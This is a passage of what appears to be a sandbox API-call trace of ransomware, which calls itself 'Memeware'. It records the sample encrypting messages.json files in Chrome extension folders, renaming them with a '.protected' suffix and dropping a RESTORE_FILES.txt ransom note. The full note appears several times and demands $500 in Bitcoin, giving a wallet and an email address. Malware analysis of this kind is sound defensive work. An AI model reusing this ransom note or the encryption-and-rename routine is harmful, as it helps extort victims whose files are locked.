lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.448] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.448] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.457] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.457] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.457] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.457] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.457] CloseHandle (hObject=0x164) returned 1 [0081.457] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.457] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0081.458] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0081.458] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0081.458] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0081.458] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it") returned 141 [0081.458] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0081.458] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0081.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*") returned 143 [0081.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\.") returned 143 [0081.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.458] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.458] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\..") returned 144 [0081.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.458] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.458] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.458] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.459] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.459] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.459] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.459] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.459] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.459] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.460] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.460] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0081.460] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.460] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.460] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.461] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0081.461] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.461] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.461] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.461] CloseHandle (hObject=0x168) returned 1 [0081.461] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.protected") returned 165 [0081.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.protected")) returned 1 [0081.462] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.462] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0081.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.462] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.462] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.463] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.463] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.463] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.463] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.463] CloseHandle (hObject=0x164) returned 1 [0081.463] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0081.463] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0081.463] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja") returned 141 [0081.463] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0081.463] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0081.463] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*") returned 143 [0081.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.464] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.464] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.464] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.464] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.464] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.464] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\.") returned 143 [0081.464] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.464] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.464] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.464] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.464] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.464] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.464] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.464] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\..") returned 144 [0081.464] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.464] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.464] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.464] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.464] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.464] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.464] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.464] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.465] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.465] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.465] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.465] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.465] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0081.465] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.465] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10f, lpOverlapped=0x0) returned 1 [0081.466] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.466] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10f, lpOverlapped=0x0) returned 1 [0081.466] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.466] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.466] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.466] CloseHandle (hObject=0x168) returned 1 [0081.466] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.protected") returned 165 [0081.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.protected")) returned 1 [0081.467] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.467] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.467] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0081.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.467] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your 